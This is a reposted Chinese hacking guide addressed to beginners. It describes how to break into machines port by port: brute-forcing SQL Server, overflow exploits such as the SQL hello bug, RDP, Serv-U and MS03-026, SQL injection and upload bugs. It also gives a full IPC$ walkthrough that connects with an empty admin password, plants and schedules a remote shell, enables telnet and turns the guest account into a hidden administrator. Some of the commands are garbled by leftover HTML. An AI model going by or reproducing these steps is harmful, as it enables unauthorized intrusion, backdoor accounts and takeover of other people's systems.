经典:各个网络端口的入侵方法[中国计算机爱好者]

经典:各个网络端口的入侵方法[中国计算机爱好者] 经典:各个网络端口的入侵方法出处:希赛网     作者:佚名     点击数:25     更新时间:2007-11-5google_ad_client=”pub-1871858541911482″;google_ad_width=468;google_ad_heigh

经典:各个网络端口的入侵方法

出处:希赛网      作者:佚名      点击数:
<script src=”/GetHits.asp?ChannelID=1&InfoID=13760″ type=text/JavaScript></script>
25
      更新时间:2007-11-5

<script type=text/javascript>

</script>

<script src=”http://pagead2.googlesyndication.com/pagead/show_ads.js” type=text/javascript>
</script>
 

希望对新手入侵有帮助!

  计算机”端口”是英文port的义译,可以认为是计算机与外界通讯交流的出口。其中硬件领域的端口又称接口,如:USB端口、串行端口等。软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和I/O(基本输入输出)缓冲区。

  按端口号可分为3大类:

  (1)公认端口(WellKnownPorts):从0到1023,它们紧密绑定(binding)于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。

  (2)注册端口(RegisteredPorts):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。

  (3)动态和/或私有端口(Dynamicand/orPrivatePorts):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。

  1. 1433端口入侵

  scanport.exe 查有1433的机器

  SQLScanPass.exe 进行字典暴破(字典是关键)

  最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

  (以上反向的,测试成功)

  sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

  2. 4899端口入侵

  用4899过滤器.exe,扫描空口令的机器

  3. 3899的入侵

  对很早的机器,可以试试3389的溢出(win3389ex.exe)

  对2000的机器,可以试试字典暴破。(tscrack.exe)

  4. 80入侵

  对sp3以前的机器,可以用webdav入侵;

  对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

  可以利用SQL进行注入。(啊D的注入软件)。

  5. serv-u入侵(21端口)

  对5. 004及以下系统,可用溢出入侵。(serv5004.exe)

  对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

  对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)

  输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码

  6. 554端口

  用real554.exe入侵。

  7. 6129端口

  用DameWare6129.exe入侵。

  8. 系统漏洞

  利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。

9. 3127等端口

  可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

  10. 其他入侵

  利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

  经典IPC$入侵

  1. C:/>net use $”>//127.0.0.1/IPC$ “” /user:”admintitrators”

  这是用”流光”扫到的用户名是administrators,密码为”空”的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为”空”,所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

  2. C:/>copy srv.exe $”>//127.0.0.1/admin$

  先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:/winnt/system32/,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

  3. C:/>net time file://127.0.0.1/

  查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

  4. C:/>at file://127.0.0.1/ 11:05 srv.exe

  用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.

  5. C:/>net time file://127.0.0.1/

  再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:/>telnet 127.0.0.1 99

  这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

  虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

  7.C:/>copy ntlm.exe $”>//127.0.0.1/admin$

  用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

  8. C:/WINNT/system32>ntlm

  输入ntlm启动(这里的C:/WINNT/system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现”DONE”的时候,就说明已经启动正常。然后使用”net start telnet”来开启Telnet服务!

  9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组

  10. C:/>net user guest /active:yes

  将对方的Guest用户激活

  11. C:/>net user guest 1234

  将Guest的密码改为1234,或者你要设定的密码

  12. C:/>net localgroup administrators guest /add

  将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/37944.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注